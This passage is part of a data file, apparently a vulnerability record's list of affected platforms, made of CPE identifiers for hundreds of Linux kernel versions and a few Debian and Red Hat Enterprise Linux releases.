"cpe:/o:linux:linux_kernel:4.4.1", "cpe:/o:linux:linux_kernel:3.10.43", "cpe:/o:linux:linux_kernel:3.12.23", "cpe:/o:linux:linux_kernel:3.18.46", "cpe:/o:linux:linux_kernel:2.6.1", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.14.31", "cpe:/o:linux:linux_kernel:3.18.53", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.16.0", "cpe:/o:linux:linux_kernel:4.1.33", "cpe:/o:linux:linux_kernel:4.5.0", "cpe:/o:linux:linux_kernel:2.6.39:rc2", "cpe:/o:linux:linux_kernel:2.5.8", "cpe:/o:linux:linux_kernel:2.6.23.9", "cpe:/o:linux:linux_kernel:2.6.30.9", "cpe:/o:linux:linux_kernel:3.10.78", "cpe:/o:linux:linux_kernel:3.14.17", "cpe:/o:linux:linux_kernel:2.6.16.44", "cpe:/o:linux:linux_kernel:2.6.30:rc6", "cpe:/o:linux:linux_kernel:2.6.26.5", "cpe:/o:linux:linux_kernel:3.12.14", "cpe:/o:linux:linux_kernel:3.18.17", "cpe:/o:linux:linux_kernel:3.14.26", "cpe:/o:linux:linux_kernel:2.6.21.7", "cpe:/o:linux:linux_kernel:4.6.2", "cpe:/o:linux:linux_kernel:2.6.13:rc6", "cpe:/o:linux:linux_kernel:2.0.19", "cpe:/o:linux:linux_kernel:2.6.0:test1", "cpe:/o:linux:linux_kernel:4.4.7", "cpe:/o:linux:linux_kernel:2.6.32.26", "cpe:/o:linux:linux_kernel:2.6.27.12", "cpe:/o:linux:linux_kernel:3.10.7", "cpe:/o:linux:linux_kernel:3.4.83", "cpe:/o:linux:linux_kernel:3.10.95", "cpe:/o:linux:linux_kernel:2.6.11:rc1", "cpe:/o:linux:linux_kernel:4.1.21", "cpe:/o:linux:linux_kernel:2.4.18:pre1", "cpe:/o:linux:linux_kernel:3.10.8::~~~~arm64~", "cpe:/o:linux:linux_kernel:2.3.46", "cpe:/o:linux:linux_kernel:3.4.62", "cpe:/o:linux:linux_kernel:2.1.69", "cpe:/o:linux:linux_kernel:2.4.20", "cpe:/o:linux:linux_kernel:3.18.52", "cpe:/o:linux:linux_kernel:2.6.33.3", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:2.6.29.5", "cpe:/o:linux:linux_kernel:2.4.14", "cpe:/o:linux:linux_kernel:2.6.39.2", "cpe:/o:linux:linux_kernel:3.6.5", "cpe:/o:linux:linux_kernel:2.6.33:rc5", "cpe:/o:linux:linux_kernel:2.6.23.14", "cpe:/o:linux:linux_kernel:4.4.77", "cpe:/o:linux:linux_kernel:4.1.19", "cpe:/o:linux:linux_kernel:2.6.24.5", "cpe:/o:linux:linux_kernel:2.6.20:rc4", "cpe:/o:linux:linux_kernel:2.6.9:final", "cpe:/o:linux:linux_kernel:2.6.27:rc8", "cpe:/o:linux:linux_kernel:3.10.94", "cpe:/o:linux:linux_kernel:2.6.27.8", "cpe:/o:linux:linux_kernel:2.6.27.5", "cpe:/o:linux:linux_kernel:2.2.26", "cpe:/o:linux:linux_kernel:3.10.36", "cpe:/o:linux:linux_kernel:2.6.37", "cpe:/o:linux:linux_kernel:2.6.36.3", "cpe:/o:linux:linux_kernel:2.6.23:rc8", "cpe:/o:linux:linux_kernel:2.1.44", "cpe:/o:linux:linux_kernel:2.6.18:rc3", "cpe:/o:linux:linux_kernel:3.9.3::~~~~arm64~", "cpe:/o:linux:linux_kernel:4.6.4", "cpe:/o:linux:linux_kernel:3.15.10", "cpe:/o:linux:linux_kernel:3.9.9::~~~~arm64~", "cpe:/o:linux:linux_kernel:3.18.39", "cpe:/o:linux:linux_kernel:4.1.4", "cpe:/o:linux:linux_kernel:4.4.79", "cpe:/o:linux:linux_kernel:3.10.60", "cpe:/o:linux:linux_kernel:2.2.25", "cpe:/o:linux:linux_kernel:2.6.16.18", "cpe:/o:linux:linux_kernel:3.3:rc7", "cpe:/o:linux:linux_kernel:2.3.40", "cpe:/o:linux:linux_kernel:4.4.11", "cpe:/o:linux:linux_kernel:2.6.32.3", "cpe:/o:linux:linux_kernel:3.10.9", "cpe:/o:linux:linux_kernel:2.3.2", "cpe:/o:linux:linux_kernel:2.6.22.1", "cpe:/o:linux:linux_kernel:2.6.32.43", "cpe:/o:linux:linux_kernel:2.6.15.7", "cpe:/o:linux:linux_kernel:2.6.25:rc1", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:4.4.108", "cpe:/o:linux:linux_kernel:2.5.18", "cpe:/o:linux:linux_kernel:4.1.45", "cpe:/o:linux:linux_kernel:2.6.21:git1", "cpe:/o:linux:linux_kernel:4.8.4", "cpe:/o:linux:linux_kernel:3.6", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:4.4.73", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:2.6.19:rc3", "cpe:/o:linux:linux_kernel:2.6.27:rc4", "cpe:/o:linux:linux_kernel:4.4.66", "cpe:/o:linux:linux_kernel:3.12.37", "cpe:/o:linux:linux_kernel:4.4.139", "cpe:/o:linux:linux_kernel:2.6.17.11", "cpe:/o:linux:linux_kernel:2.6.29:rc4", "cpe:/o:linux:linux_kernel:2.6.38.3", "cpe:/o:linux:linux_kernel:4.4.116", "cpe:/o:linux:linux_kernel:3.18.61", "cpe:/o:linux:linux_kernel:2.6.14", "cpe:/o:linux:linux_kernel:3.12.10", "cpe:/o:linux:linux_kernel:2.5.30", "cpe:/o:linux:linux_kernel:4.3:rc2", "cpe:/o:linux:linux_kernel:2.6.16.29", "cpe:/o:linux:linux_kernel:3.6.3", "cpe:/o:linux:linux_kernel:2.6.16.27", "cpe:/o:linux:linux_kernel:3.10.14", "cpe:/o:linux:linux_kernel:3.15.5", "cpe:/o:linux:linux_kernel:3.18.16", "cpe:/o:linux:linux_kernel:3.4.42", "cpe:/o:linux:linux_kernel:3.4.66", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:2.6.6:rc2", "cpe:/o:linux:linux_kernel:4.3.1", "cpe:/o:linux:linux_kernel:2.5.19", "cpe:/o:linux:linux_kernel:3.8.10", "cpe:/o:linux:linux_kernel:2.5.66", "cpe:/o:linux:linux_kernel:2.6.23:rc5", "cpe:/o:linux:linux_kernel:3.14.54", "cpe:/o:linux:linux_kernel:3.18.2", "cpe:/o:linux:linux_kernel:3.14.37", "cpe:/o:linux:linux_kernel:2.6.22:rc6", "cpe:/o:linux:linux_kernel:3.14.59", "cpe:/o:linux:linux_kernel:2.6.32.20", "cpe:/o:linux:linux_kernel:3.12.57", "cpe:/o:linux:linux_kernel:2.2.27:rc1", "cpe:/o:linux:linux_kernel:3.10.37", "cpe:/o:linux:linux_kernel:3.18.50", "cpe:/o:linux:linux_kernel:2.6.27.16", "cpe:/o:linux:linux_kernel:2.3.10", "cpe:/o:linux:linux_kernel:2.0.10", "cpe:/o:linux:linux_kernel:2.1.19", "cpe:/o:linux:linux_kernel:4.4.57", "cpe:/o:linux:linux_kernel:2.0.6", "cpe:/o:linux:linux_kernel:2.6.30.5", "cpe:/o:linux:linux_kernel:2.6.22.11", "cpe:/o:linux:linux_kernel:2.1.28", "cpe:/o:linux:linux_kernel:2.6.11.2", "cpe:/o:linux:linux_kernel:2.6.17.2", "cpe:/o:linux:linux_kernel:2.5.16", "cpe:/o:linux:linux_kernel:3.12.46", "cpe:/o:linux:linux_kernel:2.6.27.7", "cpe:/o:linux:linux_kernel:2.4.27:pre3", "cpe:/o:linux:linux_kernel:3.18.30", "cpe:/o:linux:linux_kernel:3.8.12", "cpe:/o:linux:linux_kernel:4.8:rc5", "cpe:/o:linux:linux_kernel:2.1.71", "cpe:/o:linux:linux_kernel:2.3.41", "cpe:/o:linux:linux_kernel:2.6.27.2", "cpe:/o:linux:linux_kernel:3.18.58", "cpe:/o:linux:linux_kernel:4.4.25", "cpe:/o:linux:linux_kernel:3.7.8", "cpe:/o:linux:linux_kernel:2.5.25", "cpe:/o:linux:linux_kernel:2.6.27.18", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:2.1.75", "cpe:/o:linux:linux_kernel:2.6.11.11", "cpe:/o:linux:linux_kernel:2.6.36.2", "cpe:/o:linux:linux_kernel:2.6.27.15", "cpe:/o:linux:linux_kernel:2.0.32", "cpe:/o:linux:linux_kernel:4.4.74", "cpe:/o:linux:linux_kernel:2.6.17:rc3", "cpe:/o:linux:linux_kernel:4.1:rc8", "cpe:/o:linux:linux_kernel:2.6.16.21", "cpe:/o:linux:linux_kernel:2.6.33.2", "cpe:/o:linux:linux_kernel:4.7.10", "cpe:/o:linux:linux_kernel:2.1.31", "cpe:/o:linux:linux_kernel:2.5.37", "cpe:/o:linux:linux_kernel:3.14:rc4", "cpe:/o:linux:linux_kernel:3.11.3", "cpe:/o:linux:linux_kernel:3.4.81", "cpe:/o:linux:linux_kernel:3.10.88", "cpe:/o:linux:linux_kernel:2.6.34.9", "cpe:/o:linux:linux_kernel:3.4.93", "cpe:/o:linux:linux_kernel:2.6.27:rc9", "cpe:/o:linux:linux_kernel:2.6.14:rc5", "cpe:/o:linux:linux_kernel:2.6.32.37", "cpe:/o:linux:linux_kernel:4.4.120", "cpe:/o:linux:linux_kernel:3.0.67", "cpe:/o:linux:linux_kernel:2.2.21:pre3", "cpe:/o:linux:linux_kernel:2.1.8", "cpe:/o:linux:linux_kernel:3.10.65", "cpe:/o:linux:linux_kernel:3.14.36", "cpe:/o:linux:linux_kernel:2.0.36", "cpe:/o:linux:linux_kernel:4.6", "cpe:/o:linux:linux_kernel:2.6.26:rc4", "cpe:/o:linux:linux_kernel:2.6.22:rc4", "cpe:/o:linux:linux_kernel:4.4.121", "cpe:/o:linux:linux_kernel:2.3.39", "cpe:/o:linux:linux_kernel:2.6.30:rc3", "cpe:/o:linux:linux_kernel:4.2.4", "cpe:/o:linux:linux_kernel:2.6.28:rc1", "cpe:/o:linux:linux_kernel:2.6.27.53", "cpe:/o:linux:linux_kernel:2.1.51", "cpe:/o:linux:linux_kernel:2.6.27.11", "cpe:/o:linux:linux_kernel:4.3:rc7", "cpe:/o:linux:linux_kernel:2.6.34:rc5", "cpe:/o:linux:linux_kernel:4.4.109", "cpe:/o:linux:linux_kernel:3.2.79", "cpe:/o:linux:linux_kernel:3.4.50", "cpe:/o:linux:linux_kernel:3.14.58", "cpe:/o:linux:linux_kernel:4.4.81", "cpe:/o:linux:linux_kernel:2.6.28.10", "cpe:/o:linux:linux_kernel:3.4.111", "cpe:/o:linux:linux_kernel:3.10.87", "cpe:/o:linux:linux_kernel:2.3.49", "cpe:/o:linux:linux_kernel:3.14.57", "cpe:/o:linux:linux_kernel:2.6.27.33", "cpe:/o:linux:linux_kernel:4.3.6", "cpe:/o:linux:linux_kernel:2.6.32.1", "cpe:/o:linux:linux_kernel:2.0.23", "cpe:/o:linux:linux_kernel:2.3.28", "cpe:/o:linux:linux_kernel:3.10.10", "cpe:/o:linux:linux_kernel:3.4.91", "cpe:/o:linux:linux_kernel:3.17.8", "cpe:/o:linux:linux_kernel:2.6.23", "cpe:/o:linux:linux_kernel:2.6.24:rc7", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:2.3.51", "cpe:/o:linux:linux_kernel:4.5.5", "cpe:/o:linux:linux_kernel:2.4.0:test1", "cpe:/o:linux:linux_kernel:3.0.45", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:2.6.19", "cpe:/o:linux:linux_kernel:4.0.9", "cpe:/o:linux:linux_kernel:2.1.56", "cpe:/o:linux:linux_kernel:4.4.123", "cpe:/o:linux:linux_kernel:2.2.21", "cpe:/o:linux:linux_kernel:4.4.94", "cpe:/o:linux:linux_kernel:2.6.33.4", "cpe:/o:linux:linux_kernel:3.0.69", "cpe:/o:linux:linux_kernel:2.6.27.32", "cpe:/o:linux:linux_kernel:4.7:rc1", "cpe:/o:linux:linux_kernel:2.6.34.1", "cpe:/o:linux:linux_kernel:4.9.6", "cpe:/o:linux:linux_kernel:3.12.15", "cpe:/o:linux:linux_kernel:4.4.29", "cpe:/o:linux:linux_kernel:2.5.13", "cpe:/o:linux:linux_kernel:2.6.12.5", "cpe:/o:linux:linux_kernel:2.1.119", "cpe:/o:linux:linux_kernel:4.1.50", "cpe:/o:linux:linux_kernel:2.0.4", "cpe:/o:linux:linux_kernel:2.6.21.6", "cpe:/o:linux:linux_kernel:2.6.19.5", "cpe:/o:linux:linux_kernel:2.6.32.39", "cpe:/o:linux:linux_kernel:3.12.42", "cpe:/o:linux:linux_kernel:4.4.131", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:2.6.33.8", "cpe:/o:linux:linux_kernel:2.6.30.7", "cpe:/o:linux:linux_kernel:2.6.16.51", "cpe:/o:linux:linux_kernel:2.1.46", "cpe:/o:linux:linux_kernel:2.6.17.1", "cpe:/o:linux:linux_kernel:2.1.87", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:2.4.19:pre5", "cpe:/o:linux:linux_kernel:3.18.51", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.16.1", "cpe:/o:linux:linux_kernel:4.2:rc2", "cpe:/o:linux:linux_kernel:2.6.30:rc5", "cpe:/o:linux:linux_kernel:2.3.18", "cpe:/o:linux:linux_kernel:3.14.62", "cpe:/o:linux:linux_kernel:4.1.29", "cpe:/o:linux:linux_kernel:2.6.35:rc1", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.14.32", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:linux:linux_kernel:4.6.6", "cpe:/o:linux:linux_kernel:2.4.26", "cpe:/o:linux:linux_kernel:2.4.22:pre10", "cpe:/o:linux:linux_kernel:2.6.31.3", "cpe:/o:linux:linux_kernel:2.1.52", "cpe:/o:linux:linux_kernel:4.4.80", "cpe:/o:linux:linux_kernel:2.0.35", "cpe:/o:linux:linux_kernel:2.6.16.30", "cpe:/o:linux:linux_kernel:4.7.4", "cpe:/o:linux:linux_kernel:4.2.8", "cpe:/o:linux:linux_kernel:3.4.109", "cpe:/o:linux:linux_kernel:2.4.19:pre4", "cpe:/o:linux:linux_kernel:2.6.21:git5", "cpe:/o:linux:linux_kernel:2.6.20.15", "cpe:/o:linux:linux_kernel:4.0.6", "cpe:/o:linux:linux_kernel:3.14.34", "cpe:/o:linux:linux_kernel:2.6.23:rc9", "cpe:/o:linux:linux_kernel:2.1.47", "cpe:/o:linux:linux_kernel:3.10.3", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.2.66", "cpe:/o:linux:linux_kernel:2.6.10:rc3", "cpe:/o:linux:linux_kernel:2.1.79", "cpe:/o:linux:linux_kernel:3.0.82", "cpe:/o:linux:linux_kernel:2.6.26.7", "cpe:/o:linux:linux_kernel:3.4.105", "cpe:/o:linux:linux_kernel:2.1.63", "cpe:/o:linux:linux_kernel:2.0.14", "cpe:/o:linux:linux_kernel:2.6.16.53", "cpe:/o:linux:linux_kernel:2.6.19.6", "cpe:/o:linux:linux_kernel:4.4.95", "cpe:/o:linux:linux_kernel:2.6.3:rc2", "cpe:/o:linux:linux_kernel:2.6.23.13", "cpe:/o:linux:linux_kernel:2.3.6", "cpe:/o:linux:linux_kernel:3.4:rc7:~~~~x86~", "cpe:/o:linux:linux_kernel:3.14.14", "cpe:/o:linux:linux_kernel:3.12.17", "cpe:/o:linux:linux_kernel:3.10.51", "cpe:/o:linux:linux_kernel:2.6.27.38", "cpe:/o:linux:linux_kernel:3.10.12", "cpe:/o:linux:linux_kernel:4.4.112", "cpe:/o:linux:linux_kernel:2.6.23.10", "cpe:/o:linux:linux_kernel:2.6.26:rc8", "cpe:/o:linux:linux_kernel:3.0.49", "cpe:/o:linux:linux_kernel:4.4.24", "cpe:/o:linux:linux_kernel:2.6.1:rc1", "cpe:/o:linux:linux_kernel:2.1.129", "cpe:/o:linux:linux_kernel:3.10.67", "cpe:/o:linux:linux_kernel:2.3.47", "cpe:/o:linux:linux_kernel:3.9:rc1", "cpe:/o:linux:linux_kernel:2.6.16.57", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.0.80", "cpe:/o:linux:linux_kernel:2.6.34.6", "cpe:/o:linux:linux_kernel:3.14.40", "cpe:/o:linux:linux_kernel:4.4:rc8", "cpe:/o:linux:linux_kernel:2.6.19:rc6", "cpe:/o:linux:linux_kernel:4.1.43", "cpe:/o:linux:linux_kernel:2.6.26.4", "cpe:/o:linux:linux_kernel:2.6.32.34", "cpe:/o:linux:linux_kernel:2.1.84", "cpe:/o:linux:linux_kernel:2.6.13", "cpe:/o:linux:linux_kernel:2.4.18:pre2", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:2.4.25", "cpe:/o:linux:linux_kernel:4.4.39", "cpe:/o:linux:linux_kernel:2.6.34:rc6", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:4.2:rc3", "cpe:/o:linux:linux_kernel:2.6.11.9", "cpe:/o:linux:linux_kernel:2.6.21:rc3", "cpe:/o:linux:linux_kernel:3.12.36", "cpe:/o:linux:linux_kernel:3.10.6", "cpe:/o:linux:linux_kernel:4.4.63", "cpe:/o:linux:linux_kernel:2.6.35.3", "cpe:/o:linux:linux_kernel:4.3.4", "cpe:/o:linux:linux_kernel:2.1.124", "cpe:/o:linux:linux_kernel:2.6.14.5", "cpe:/o:linux:linux_kernel:2.0.34", "cpe:/o:linux:linux_kernel:2.6.1:rc2", "cpe:/o:linux:linux_kernel:2.3.17", "cpe:/o:linux:linux_kernel:2.6.27.23", "cpe:/o:linux:linux_kernel:2.6.33.14", "cpe:/o:linux:linux_kernel:3.2:rc2", "cpe:/o:linux:linux_kernel:2.2.1", "cpe:/o:linux:linux_kernel:2.6.20.11", "cpe:/o:linux:linux_kernel:3.0.59", "cpe:/o:linux:linux_kernel:3.18.55", "cpe:/o:linux:linux_kernel:2.2.18", "cpe:/o:linux:linux_kernel:2.3.25", "cpe:/o:linux:linux_kernel:4.4.20", "cpe:/o:linux:linux_kernel:3.10.81", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:2.1.11", "cpe:/o:linux:linux_kernel:3.8.3", "cpe:/o:linux:linux_kernel:2.6.33:rc1", "cpe:/o:linux:linux_kernel:4.4.19", "cpe:/o:linux:linux_kernel:2.1.105", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:2.6.34:rc1", "cpe:/o:linux:linux_kernel:1.2.0", "cpe:/o:linux:linux_kernel:4.9.9", "cpe:/o:linux:linux_kernel:3.0.50", "cpe:/o:linux:linux_kernel:2.4.8", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:2.6.31.9", "cpe:/o:linux:linux_kernel:2.6.37.3", "cpe:/o:linux:linux_kernel:2.6.30:rc1", "cpe:/o:linux:linux_kernel:4.4.71", "cpe:/o:linux:linux_kernel:2.6.35.6", "cpe:/o:linux:linux_kernel:2.6.33.18", "cpe:/o:linux:linux_kernel:2.6.21:git4", "cpe:/o:linux:linux_kernel:2.6.34:rc2", "cpe:/o:linux:linux_kernel:3.18.31", "cpe:/o:linux:linux_kernel:3.10.38", "cpe:/o:linux:linux_kernel:4.1", "cpe:/o:linux:linux_kernel:2.1.48", "cpe:/o:linux:linux_kernel:2.6.27.24", "cpe:/o:linux:linux_kernel:4.4.55", "cpe:/o:linux:linux_kernel:2.6.28.8", "cpe:/o:linux:linux_kernel:2.6.37.6", "cpe:/o:linux:linux_kernel:3.12.18", "cpe:/o:linux:linux_kernel:4.1.28", "cpe:/o:linux:linux_kernel:2.6.31", "cpe:/o:linux:linux_kernel:2.5.31", "cpe:/o:linux:linux_kernel:3.18.49", "cpe:/o:linux:linux_kernel:3.9:rc6", "cpe:/o:linux:linux_kernel:2.6.33:rc3", "cpe:/o:linux:linux_kernel:4.4.37", "cpe:/o:linux:linux_kernel:2.2.14", "cpe:/o:linux:linux_kernel:2.1.91", "cpe:/o:linux:linux_kernel:2.6.23.6", "cpe:/o:linux:linux_kernel:2.5.20", "cpe:/o:linux:linux_kernel:2.1.108", "cpe:/o:linux:linux_kernel:3.4.52", "cpe:/o:linux:linux_kernel:2.6.32.57", "cpe:/o:linux:linux_kernel:2.6.38.1", "cpe:/o:linux:linux_kernel:2.2.27:pre1", "cpe:/o:linux:linux_kernel:3.10.91", "cpe:/o:linux:linux_kernel:2.2.24:rc3", "cpe:/o:linux:linux_kernel:3.14:rc1", "cpe:/o:linux:linux_kernel:2.6.22:rc2", "cpe:/o:linux:linux_kernel:2.6.15.6", "cpe:/o:linux:linux_kernel:2.6.27.4", "cpe:/o:linux:linux_kernel:3.8.13", "cpe:/o:linux:linux_kernel:2.6.17:rc2", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.8.5", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:2.4.27:pre5", "cpe:/o:linux:linux_kernel:2.1.0", "cpe:/o:linux:linux_kernel:2.6.27.29", "cpe:/o:linux:linux_kernel:3.9.0::~~~~arm64~", "cpe:/o:linux:linux_kernel:2.6.3:rc4", "cpe:/o:linux:linux_kernel:3.14:-", "cpe:/o:linux:linux_kernel:2.6.19.2", "cpe:/o:linux:linux_kernel:4.4.52", "cpe:/o:linux:linux_kernel:2.5.5", "cpe:/o:linux:linux_kernel:2.1.100", "cpe:/o:linux:linux_kernel:3.9.11", "cpe:/o:linux:linux_kernel:2.6.15:rc1", "cpe:/o:linux:linux_kernel:2.6.25:rc7", "cpe:/o:linux:linux_kernel:4.4.53", "cpe:/o:linux:linux_kernel:2.6.30.2", "cpe:/o:linux:linux_kernel:2.1.21", "cpe:/o:linux:linux_kernel:2.4.27:pre4", "cpe:/o:linux:linux_kernel:3.4.94", "cpe:/o:linux:linux_kernel:4.6.7", "cpe:/o:linux:linux_kernel:2.5.44", "cpe:/o:linux:linux_kernel:4.4.118", "cpe:/o:linux:linux_kernel:2.6.17.10", "cpe:/o:linux:linux_kernel:2.1.67", "cpe:/o:linux:linux_kernel:3.4.104", "cpe:/o:linux:linux_kernel:2.6.39.3", "cpe:/o:linux:linux_kernel:2.4.0:test8", "cpe:/o:linux:linux_kernel:2.6.16.19", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:2.6.25:rc6", "cpe:/o:linux:linux_kernel:2.1.26", "cpe:/o:linux:linux_kernel:3.3:rc3", "cpe:/o:linux:linux_kernel:2.5.38", "cpe:/o:linux:linux_kernel:3.8", "cpe:/o:linux:linux_kernel:3.0.83", "cpe:/o:linux:linux_kernel:2.1.50", "cpe:/o:linux:linux_kernel:3.12.33", "cpe:/o:linux:linux_kernel:2.2.16:pre6", "cpe:/o:linux:linux_kernel:2.1.85", "cpe:/o:linux:linux_kernel:3.14.18", "cpe:/o:linux:linux_kernel:3.14:rc8", "cpe:/o:linux:linux_kernel:4.8.16", "cpe:/o:linux:linux_kernel:2.5.4", "cpe:/o:redhat:enterprise_linux_server_eus:7.3", "cpe:/o:linux:linux_kernel:2.1.93", "cpe:/o:linux:linux_kernel:3.10.19", "cpe:/o:linux:linux_kernel:3.11", "cpe:/o:linux:linux_kernel:2.6.35:rc5", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.9.5", "cpe:/o:linux:linux_kernel:3.14.30", "cpe:/o:linux:linux_kernel:3.16", "cpe:/o:linux:linux_kernel:3.12.54", "cpe:/o:linux:linux_kernel:2.6.15.1", "cpe:/o:linux:linux_kernel:3.13.7", "cpe:/o:linux:linux_kernel:3.12.29", "cpe:/o:linux:linux_kernel:2.6.37:rc3", "cpe:/o:linux:linux_kernel:2.6.23.7", "cpe:/o:linux:linux_kernel:2.5.49", "cpe:/o:linux:linux_kernel:3.10.50", "cpe:/o:linux:linux_kernel:4.1.9", "cpe:/o:linux:linux_kernel:2.6.6:rc3", "cpe:/o:linux:linux_kernel:2.6.34:rc3", "cpe:/o:linux:linux_kernel:2.6.17:rc5", "cpe:/o:linux:linux_kernel:2.6.22.20", "cpe:/o:linux:linux_kernel:2.6.31.8", "cpe:/o:linux:linux_kernel:3.6.1", "cpe:/o:linux:linux_kernel:2.6.13:rc5", "cpe:/o:linux:linux_kernel:4.4.26", "cpe:/o:linux:linux_kernel:3.4.33", "cpe:/o:linux:linux_kernel:2.1.4", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:2.3.1", "cpe:/o:linux:linux_kernel:2.6.27.46", "cpe:/o:linux:linux_kernel:3.12.11", "cpe:/o:linux:linux_kernel:2.4.7", "cpe:/o:linux:linux_kernel:3.12.34", "cpe:/o:linux:linux_kernel:2.6.35:rc6", "cpe:/o:linux:linux_kernel:2.6.20", "cpe:/o:linux:linux_kernel:3.14.50", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:2.6.16.60", "cpe:/o:linux:linux_kernel:3.9.6::~~~~arm64~", "cpe:/o:linux:linux_kernel:3.4.48", "cpe:/o:linux:linux_kernel:2.6.21:git3", "cpe:/o:linux:linux_kernel:2.6.16.34", "cpe:/o:linux:linux_kernel:4.1.24", "cpe:/o:linux:linux_kernel:3.10.20", "cpe:/o:linux:linux_kernel:3.15.3", "cpe:/o:linux:linux_kernel:2.6.27.58", "cpe:/o:linux:linux_kernel:2.5.2", "cpe:/o:linux:linux_kernel:2.1.127", "cpe:/o:linux:linux_kernel:2.6.22.7", "cpe:/o:linux:linux_kernel:3.4.40", "cpe:/o:linux:linux_kernel:2.6.35.11", "cpe:/o:linux:linux_kernel:2.6.25.1", "cpe:/o:linux:linux_kernel:2.6.31:rc1", "cpe:/o:linux:linux_kernel:2.6.38:rc2", "cpe:/o:linux:linux_kernel:2.6.28:rc9", "cpe:/o:linux:linux_kernel:4.4.105", "cpe:/o:linux:linux_kernel:3.0.96", "cpe:/o:linux:linux_kernel:3.10.73", "cpe:/o:linux:linux_kernel:2.6.16.14", "cpe:/o:linux:linux_kernel:2.3.13", "cpe:/o:linux:linux_kernel:2.1.30", "cpe:/o:linux:linux_kernel:4.4.97", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:2.6.8:rc1", "cpe:/o:linux:linux_kernel:4.0.7", "cpe:/o:linux:linux_kernel:4.1.39", "cpe:/o:linux:linux_kernel:3.10.59", "cpe:/o:linux:linux_kernel:2.6.27.26", "cpe:/o:linux:linux_kernel:2.2.27:pre2", "cpe:/o:linux:linux_kernel:2.6.38.5", "cpe:/o:linux:linux_kernel:4.4.17", "cpe:/o:linux:linux_kernel:4.1.37", "cpe:/o:linux:linux_kernel:2.0.21", "cpe:/o:linux:linux_kernel:2.6.25.11", "cpe:/o:linux:linux_kernel:4.7.8", "cpe:/o:linux:linux_kernel:4.4.5", "cpe:/o:linux:linux_kernel:4.1.30", "cpe:/o:linux:linux_kernel:2.4.21:pre1", "cpe:/o:linux:linux_kernel:2.1.29", "cpe:/o:linux:linux_kernel:2.6.22.4", "cpe:/o:linux:linux_kernel:4.4.27", "cpe:/o:linux:linux_kernel:3.4.46", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:linux:linux_kernel:4.8.12", "cpe:/o:linux:linux_kernel:2.4.34", "cpe:/o:linux:linux_kernel:3.11.7", "cpe:/o:linux:linux_kernel:2.6.33.9", "cpe:/o:linux:linux_kernel:4.2.0", "cpe:/o:linux:linux_kernel:3.4.87", "cpe:/o:linux:linux_kernel:4.4.8", "cpe:/o:linux:linux_kernel:4.8.3", "cpe:/o:linux:linux_kernel:2.6.32.10", "cpe:/o:linux:linux_kernel:3.0.63", "cpe:/o:linux:linux_kernel:2.6.18", "cpe:/o:linux:linux_kernel:3.0.95", "cpe:/o:linux:linux_kernel:2.6.32:rc3", "cpe:/o:linux:linux_kernel:2.6.27.3", "cpe:/o:linux:linux_kernel:2.1.111", "cpe:/o:linux:linux_kernel:2.6.9:rc1", "cpe:/o:linux:linux_kernel:3.4:rc3:~~~~x86~", "cpe:/o:linux:linux_kernel:3.10.61", "cpe:/o:linux:linux_kernel:2.6.23.16", "cpe:/o:linux:linux_kernel:2.6.34.7", "cpe:/o:linux:linux_kernel:2.5.1", "cpe:/o:linux:linux_kernel:2.6.13:rc7", "cpe:/o:linux:linux_kernel:2.6.29:rc6", "cpe:/o:linux:linux_kernel:4.4.67", "cpe:/o:linux:linux_kernel:2.6.25.5", "cpe:/o:linux:linux_kernel:4.1.31", "cpe:/o:linux:linux_kernel:2.5.48", "cpe:/o:linux:linux_kernel:3.10.26", "cpe:/o:linux:linux_kernel:2.6.5:rc3", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:2.2.17", "cpe:/o:linux:linux_kernel:3.13.10", "cpe:/o:linux:linux_kernel:4.8:rc6", "cpe:/o:linux:linux_kernel:4.4.99", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.4.98", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.14.68", "cpe:/o:linux:linux_kernel:2.4.2", "cpe:/o:linux:linux_kernel:2.6.20.8", "cpe:/o:linux:linux_kernel:2.6.16.42", "cpe:/o:linux:linux_kernel:2.6.25.13", "cpe:/o:linux:linux_kernel:3.0.14", 